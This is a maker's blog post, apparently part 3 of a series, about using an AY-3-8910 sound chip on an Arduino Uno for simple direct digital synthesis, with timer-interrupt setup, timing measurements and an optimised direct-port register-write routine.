I suggested in Part 2 that it might be possible to do some simple modulation of the amplitude of the AY-3-8910 channels rather than drive frequencies directly. This is taking a look at the possibilities of some kind of lo-fi direct digital synthesis using that as a basis.
- Part 1 – Getting started and looking at playing YM files.
- Part 2 – Adding basic MIDI control.
- Part 3 – Basic experiments with direct digital synthesis.
- Part 4 – Using the AY-3-8910 as a 4-bit DAC for Mozzi.
- Part 5 – Driving four AY-3-8910s using my AY-3-8910 Experimenter PCB.
https://makertube.net/w/uCSiBG5RBufGqspoHMYFPt
Warning! I strongly recommend using old or second hand equipment for your experiments. I am not responsible for any damage to expensive instruments!
These are the key tutorials for the main concepts used in this project:
- Arduino AY3891x Library: https://github.com/Andy4495/AY3891x
- Arduino Nano AY-3-8910 PCB: https://github.com/GadgetReboot/AY-3-8910
- AY-3-8910 on synth DIY wiki: https://sdiy.info/wiki/General_Instrument_AY-3-8910
If you are new to Arduino, see the Getting Started pages.
Parts list
- Arduino Uno.
- AY-3-8910 chip.
- Either GadgetReboot’s PCB or patch using solderless breadboard or prototyping boards.
- 5V compatible MIDI interface.
- Jumper wires.
Direct Digital Synthesis on the AY-3-8910
I’ve talked about direct digital synthesis before, so won’t go into full detail again. For more, see Arduino R2R Digital Audio – Part 3 and Arduino PWM Sound Output.
But the top-level idea is to set the level of the signal according to a value in a wavetable. If this value is updated at a useful audio rate then it will be interpreted as sound.
There are some pretty major limitations with attempting to do this on the AY-3-8910 however. The biggest one being that there are only 15 levels for the output on each channel.
So I’ll be working to the following properties:
- 4-bit resolution for the output.
- 8-bit wavetable.
- 8.8 fixed point accumulator to index into the wavetable.
- 8096 Hz sample rate.
YouTuber https://www.youtube.com/@inazumadenki5588 had a look at this and showed that the AY-3-8910 needs to be set up as follows:
- Frequency value for the channel should be set to the highest frequency possible.
- All channels should be disabled.
This is due to comments in the datasheet stating that the only way to fully disable a channel is to have 0 in the amplitude field.
Note: for a 8192 sample rate, that means writing out a sample to the AY-3-8910 registers approximately once every 124uS. With a 256 value wavetable, it takes almost 32 mS to write a complete cycle at the native sample rate, which would be around a 30 Hz output.
I’m not sure what the largest increment that would still give a useful signal might be, but say it was 8 values from the wavetable, then that would make the highest frequency supported around 1kHz. Not great, but certainly audible, so worth a try.
Setting up for DDS
I want a regular, reliable, periodic routine to output the levels from the wavetable, and the usual way to achieve this is using a timer and interrupt. As Timer 1 is already in use to generate the 1MHz clock for the AY-3-8910, I’m going to be configuring Timer 2 as follows:
- Timer 2 is an 8-bit timer.
- Use prescalar of 32 which gives a 500kHz clock source (16MHz/32).
- Use CTC (clear timer on compare) mode.
- Generate a compare match interrupt.
- Do not enable any output pins.
The appropriate ATMega328 registers to enable this are:
// COM2A[1:0] = 00 No output
// WGM2[2:0] = 010 CTC mode
// CS2[2:0] = 011 Prescalar=32
ASSR = 0;
TCCR2A = _BV(WGM21);
TCCR2B = _BV(CS21) | _BV(CS20);
TCNT2 = 0;
OCR2A = 60;
TIMSK2 = _BV(OCIE2A);Although it is worth noting that enabling OC1A can be quite useful for debugging. The following toggles the OC2A output (on D11) every time there is a compare match. The frequency seen on D11 will thus be half the anticipated sample frequency.
pinMode(11, OUTPUT);
TCCR2A |= _BV(COM2A0); // COM2A[1:0] = 01 for OC2A toggleAnd this does indeed generate a signal. Here is a trace showing a timing GPIO pin and the AY-3-8910 output.
The problem is that this is meant to be a 440Hz sine wave, and whilst the shape isn’t too bad (it is a little distorted as the amplitude isn’t a true linear shape), the frequency is much nearer 100Hz than 440.
Analysis of Performance
The clue is the other trace, which is a timing pin being toggled every time the Interrupt routine is called. This is showing a 1kHz frequency, which means the IRS is being called with a 2kHz frequency rather than the anticipated 8192Hz. Curiously though I am getting an accurate 4kHz toggle on the timer output pin OC1A indicating the timer is correctly counting with a 8kHz frequency.
No matter how I configured things, the interrupt routine just would not do anything at a faster rate. I had to drop the frequency right down to 2kHz to get the output pin and interrupt routing running together. This means that something in the interrupt routine seems to be taking ~ 450uS to run.
After a fair bit of prodding and probing and checking the ATMega328 datasheet and double checking the register values, I have to conclude that the AY3891x library is just too slow at updating the registers for it to be able to run from the interrupt routine at this speed.
Taking a look at the register write() function in the library, which I need to use to update the channel level, I can see the following is happening:
void AY3891x::write(byte regAddr, byte data) {
latchAddressMode(regAddr);
daPinsOutput(data);
noInterrupts();
mode010to110();
mode110to010();
interrupts();
daPinsInput();
}
void AY3891x::latchAddressMode(byte regAddr) {
mode010to000();
daPinsOutput(_chipAddress | regAddr); // Register address is 4 lsb
mode000to001();
mode001to000();
mode000to010();
}
void AY3891x::daPinsOutput(byte data) {
byte i;
for (i = 0; i < NUM_DA_LINES; i++) {
if (_DA_pin[i] != NO_PIN) pinMode(_DA_pin[i], OUTPUT);
}
for (i = 0; i < NUM_DA_LINES; i++) {
if (_DA_pin[i] != NO_PIN) {
digitalWrite(_DA_pin[i], data & 0x01);
data = data >> 1;
}
}
}
void AY3891x::daPinsInput() {
byte i;
for (i = 0; i < NUM_DA_LINES; i++) {
if (_DA_pin[i] != NO_PIN) pinMode(_DA_pin[i], INPUT);
}
}And every one of those modeXXXtoYYY() functions is a call to digitalWrite(), so I make that 22 calls to ditigalWrite() in order to write a single register value, plus around 16 calls to pinMode(). There are also 5 loops each looping over 8 values.
One person measured the Arduino Uno digitalWrite() function and concluded that it takes 3.4uS to run, so that is a minimum of 75uS of processing in every run through the interrupt routine just for those calls alone. That doesn’t include the calls and other logic going on. It could easily be more than twice that when everything is taken into account.
Dropping in some temporary pin IO either side of the call to the AY write function itself, and I’m measuring just over 250uS for the register update to happen, and that is just for one channel. This means that anything with a period of that or faster is starving the processor from running at all.
Measuring the Basic Performance
At this point I took a step back and created a free-running test sketch to really see what is going on.
#include "AY3891x.h"
AY3891x psg( 17, 8, 7, 6, 5, 4, 3, 2, 16, 15, 14);
#define AY_CLOCK 9 // D9
void aySetup () {
pinMode(AY_CLOCK, OUTPUT);
digitalWrite(AY_CLOCK, LOW);
TCCR1A = (1 << COM1A0);
TCCR1B = (1 << WGM12) | (1 << CS10);
TCCR1C = 0;
TIMSK1 = 0;
OCR1AH = 0;
OCR1AL = 7; // 16MHz / 8 = 2MHz Counter
psg.begin();
// Output highest frequency on each channel, but set level to 0
// Highest freq = 1000000 / (16 * 1) = 62500
psg.write(AY3891x::ChA_Amplitude, 0);
psg.write(AY3891x::ChA_Tone_Period_Coarse_Reg, 0);
psg.write(AY3891x::ChA_Tone_Period_Fine_Reg, 0);
psg.write(AY3891x::ChB_Amplitude, 0);
psg.write(AY3891x::ChB_Tone_Period_Coarse_Reg, 0);
psg.write(AY3891x::ChB_Tone_Period_Fine_Reg, 0);
psg.write(AY3891x::ChC_Amplitude, 0);
psg.write(AY3891x::ChC_Tone_Period_Coarse_Reg, 0);
psg.write(AY3891x::ChC_Tone_Period_Fine_Reg, 0);
// LOW = channel is in the mix.
// Turn everything off..
psg.write(AY3891x::Enable_Reg, 0xFF);
}
int toggle;
void setup() {
pinMode(11, OUTPUT);
toggle = LOW;
digitalWrite(11, toggle);
aySetup();
}
void loop() {
toggle = !toggle;
digitalWrite(11, toggle);
for (int i=0; i<16; i++) {
psg.write(AY3891x::ChA_Amplitude, i);
}
}All this is doing is continually writing 0 to 15 to the channel A level register whilst toggling a GPIO pin. Putting an oscilloscope trace on the IO pin and the AY-3-8910 channel A output gives me the following:
This is running with a period of 6.96mS, meaning each cycle of 16 writes takes 3.5mS, giving me almost 220uS per call to the AY write function which seems to align pretty well with what I was seeing before.
And this is generating an audible tone at around 280Hz, so regardless of any timer settings or waveform processing, this is going to be the baseline frequency on which everything else would have to rest, which isn’t great.
Optimising Register Writes
So at this point I have the choice of attempting to write to the AY-3-8910 myself using PORT IO to eliminate the time it takes for all those loops and digitalWrite() calls. Or I could try some alternative libraries.
The library I’m using aims for the most portable compatibility: “This library uses the generic
digitalWrite()function instead of direct port manipulation, and should therefore work across most, if not all, processors supported by Arduino, so long as enough I/O pins are available for the interface to the PSG.”It is a deliberate design choice, but does require all three bus control signals to be used: BDIR, BC1, BC2.
Alternatives are possible with less pin state changes, but much stricter timing requirements. Some options include:
- https://github.com/53175ddd/AY-3-8910_Arduino – uses a mixture of PORT IO and digitalWrite(). Assumes use of D0-D7 for data channel.
The following are projects that have not used a library, but just done their own thing:
- https://github.com/internalregister/AY-3-8910 – uses a mixture of digitalWrite and PORT IO. Assumes use of D0-D7 for the data channel.
- https://github.com/GaryA/TB-AY-3_MIDI – uses direct PORT IO for D2-D9
Unfortunately none of these really solves the problem as the PCB I’m using does not neatly map onto IO ports to allow the use of direct PORT IO for the data.
So to improve things whilst using this same PCB will require me to re-write the library myself.
As a test however, it is possible to take the IO pin definitions used with the PCB and write a bespoke, optimised register write routine as follows:
void ayFastWrite (byte reg, byte val) {
// Mode=Addr Latch
digitalWrite(BC1, HIGH);
digitalWrite(BDIR, HIGH);
// Latch address
// NB: Addresses are all in range 0..15 so don't need to
// worry about writing out bits 6,7 - just ensure set to zero
PORTD = (PORTD & 0x03) | ((reg & 0xCF)<<2);
PORTB = (PORTB & 0xFE);
PORTC = (PORTC & 0xF7);
// Mode = Inactive
digitalWrite(BC1, LOW);
digitalWrite(BDIR, LOW);
delayMicroseconds(10);
// Mode = Write
digitalWrite(BC1, LOW);
digitalWrite(BDIR, HIGH);
// Write data
PORTD = (PORTD & 0x03) | ((val & 0xCF)<<2); // Shift bits 0:5 to 2:7
PORTB = (PORTB & 0xFE) | ((val & 0x40)>>6); // Shift bit 6 to 0
PORTC = (PORTC & 0xF7) | ((val & 0x80)>>4); // Shift bit 7 to 3
// Mode = Inactive
digitalWrite(BC1, LOW);
digitalWrite(BDIR, LOW);
}I’m using the following mapping of data pins to Arduino digital IO pins to PORTS:
DA0-DA5D2-D7PORTD Bits 0-5DA6D8PORT B Bit 0DA7A3/D17PORT C Bit 3To make this happen I have to ensure that the right bits are set to OUTPUTs and that BC2 is held HIGH prior to using the fastWrite function.
digitalWrite(BC2, HIGH);
DDRD |= 0xFC;
DDRC |= 0x04;
DDRB |= 0x01;This now improves on that previous 280Hz and gives me 1600Hz performance.
So can I do any better? Well there are still between 6 and 8 calls to digitalWrite going on to handle the control signals…
#define BC1LOW {PORTC &= 0xFE;} // A0 LOW
#define BC1HIGH {PORTC |= 0x01;} // A0 HIGH
#define BC2LOW {PORTC &= 0xFD;} // A1 LOW
#define BC2HIGH {PORTC |= 0x02;} // A1 HIGH
#define BDIRLOW {PORTC &= 0xF7;} // A2 LOW
#define BDIRHIGH {PORTC |= 0x04;} // A2 HIGH
void ayFastWrite (byte reg, byte val) {
// Mode=Addr Latch
BC1HIGH;
BDIRHIGH;
// Latch address
PORTD = (PORTD & 0x03) | ((reg & 0xCF)<<2);
PORTB = (PORTB & 0xFE);
PORTC = (PORTC & 0xF7);
// Need 400nS Min
delayMicroseconds(1);
// Mode = Inactive
BC1LOW;
BDIRLOW;
// Need 100nS settle then 50nS preamble
delayMicroseconds(1);
// Mode = Write
BC1LOW;
BDIRHIGH;
// Write data
PORTD = (PORTD & 0x03) | ((val & 0xCF)<<2); // Shift bits 0:5 to 2:7
PORTB = (PORTB & 0xFE) | ((val & 0x40)>>6); // Shift bit 6 to 0
PORTC = (PORTC & 0xF7) | ((val & 0x80)>>4); // Shift bit 7 to 3
// Need 500nS min
delayMicroseconds(1);
// Mode = Inactive
BC1LOW;
BDIRLOW;
// Need 100nS min
}The timings come from the AY-3-8910 datasheet:
The actual minimum and maximum timings for the various “t” values are given in the preceeding table. Most have a minimum value, but tBD has to be noted: the “associative delay time” is 50nS. This means that any changing of BC1, BC2 and BDIR has to occur within 50nS to be considered part of the same action.
There is no means of having a nano-second delay (well, other than just spinning code), so I’ve just used a delayMicroseconds(1) here and there. This isn’t reliably accurate on an Arduino, but as I’m have delays of around half of that as a maximum it seems to be fine.
This now gives me the following:
This is now supporting a natural “as fast as possible” frequency of around 24kHz, meaning each call to the write function is now around 3uS. That is almost a 100x improvement over using all those pinMode and digitalWrite calls.
The downside of this method:
- It is ATMega328 specific.
- It is specific to the pin mappings and PORT usage of this PCB.
- It does not support reading or other chip operations between the writes.
It is also interesting to see that the traces also show the high frequency oscillation (62.5kHz) that is being modulated regardless of the channel frequency and enable settings.
DDS Part 2
Success! At least with a single channel. This is now playing a pretty well in tune 440Hz A.
Notice how the frequency of the timing pin is now ~4.2kHz meaning that the ISR is now indeed firing at the required 8192 Hz.
Here is a close-up of the output signal. The oscilloscope was struggling to get a clean frequency reading, but this is one time I caught it reading something close! I checked the sound itself with a tuning fork (see video). It is indeed 440Hz.
Closing Thoughts
I wanted to get something put together to allow me to drive a DSS wavetable over MIDI, with different waveforms, and so on, but it turned out to be a little more involved getting this far than I anticipated, so I’ll leave it here for now.
But hopefully filling in the gaps won’t take too long and will be the subject of a further post.
Now that I have something that works, I’m actually quite surprised by how well it is working.
Kevin
#arduinoNano #ay38910 #dds #define #directDigitalSynthesis #include #midi
-
“All sanity, which is all Science, is founded upon Limit. We must be able to cut off, to define, to measure. Naturally, then, their opposites, Insanity and Religion, have for their prime characteristic, the Indefinable, Incomprehensible, Immeasurable.”